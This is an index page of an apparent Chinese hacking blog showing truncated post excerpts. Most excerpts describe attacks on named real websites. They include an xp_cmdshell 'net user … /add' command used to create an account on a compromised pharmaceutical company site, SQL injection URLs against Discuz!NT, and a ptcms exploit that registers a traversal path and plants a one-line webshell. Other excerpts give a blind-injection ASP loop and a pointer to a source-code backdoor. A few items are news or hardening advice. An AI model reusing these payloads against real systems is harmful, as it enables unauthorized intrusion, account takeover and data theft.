某虚拟主机评测源码内置后门

为防止遭恶意利用,不公开关键词,请作者理解 存在页面 AdminIncludecodeCode.asp AdminIncludemd5.asp 菜刀连接。 提示:该后门删除只要去掉这一行就可以了,对该程序官方表示BS 作者:CrackerMrX

- 阅读全文 -

申通快递官网爆注入漏洞

刚才去申通快递官网查询一个邮件,点了一个链接,然后习惯性的检测了下,然后就发现了这个蛋疼的注入漏洞,如上图所示。 这是一个很明显的 Sql Inject,结构为:Asp + Mysql,而且这几个管理员密码居然还是明文的…… 后来又去检查了下其他页面,发现该站实际上到处都是注入漏洞,本人表示相当的无语…… 该程序缺陷已通知申通快递官方,请各位同学不要继续搞了,免引起不必要的麻烦。。。。。。 同时坐...

- 阅读全文 -

英国26岁大学生入侵Facebook被判刑8个月

  英国26岁大学生格伦·曼厄姆(Glenn Mangham)因去年入侵全球最大的社交网站Facebook在上周被判8个月监禁。   据悉,曼厄姆利用一名Facebook员工的账户窃取了该公司的机密。据《卫报》报道,曼厄姆在向法庭陈述他入侵Facebook系统的理由是说:“我只是想发现Facebook系统的漏洞,然后写份报告交给Facebook,让他们知道自己的系统哪有问题。”   曼厄姆的律师在...

- 阅读全文 -

黑客组织Anonymous:每周五都将发起网络攻击

  据《连线》杂志网络版报道,黑客组织Anonymous宣布,今后将于每周五定时对目标对象展开攻击。此外,这一行动将持续下去,成为持久战。在Anonymous的周二黑客行动中,催泪弹制造商Combined Systems、联邦贸易委员会的服务器(FTC,承载三个网站business.ftc.gov, consumer.gov 和ncpw.gov)以及国家消费者权益保护周的合作网站都被攻击。   A...

- 阅读全文 -

修正药业官网被黑!

今天在网络上乱逛 不知道怎么的弹出一个修正药业的广告 点了进去就进修正的官方 在里面乱逛 看见一个注入 可是键入代码网页没有直接显示 我就丢到 Pangolin里面看看 果断的是注入点 后来验证是sa 是sa就太方便了 直接调用xp_cmdshell 上代码 ;exec master..xp_cmdshell"net user name password /add"-- ;exec master....

- 阅读全文 -

DNT存在SQL注入漏洞

注入地址: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 利用: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercon...

- 阅读全文 -

防止替换shift后门提权(sethc.exe后门)

   在很多情况下,在提权比较艰难的时候,替换shift后门提权很方便,为了防止shift后门被利用,得对它设置权限。防止简单替换shift后门提权。 一、sethc.exe存在于 c:\windows\system32\sethc.exe和c:\windows\system32\dllcache\sethc.exe 这2个目录之下 为了防止简单替换sethc.exe提权,可对sethc.exe设...

- 阅读全文 -

ptcms小说小偷程序 最新EXP漏洞

于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹, 那么我们注册../../1.asp; 或者../../2.asp 然后在书架或者收藏哪里插入一句话, 对应的木马地址是   https://www.webshell.cc/1.asp/mark.ptv ps://针对解析漏洞的 鸡肋 下面放出落叶的exp 怕在下面大家看不到哈。 <?php //error_repor...

- 阅读全文 -

字符型SQL注入猜解,利用iframe显示更方便

遇到一个注入点 是字符型的 测试了几个工具 貌似都不行 那就只有手工了 大家都知道 到猜解值的时候 一个一个asc大小的比较 还是比较麻烦的 所以想到这个 <% for s=40 to 128 response.write "<iframe src=""https://www.webshell.cc/default.asp?id=111111' and 1=(select top 1 c...

- 阅读全文 -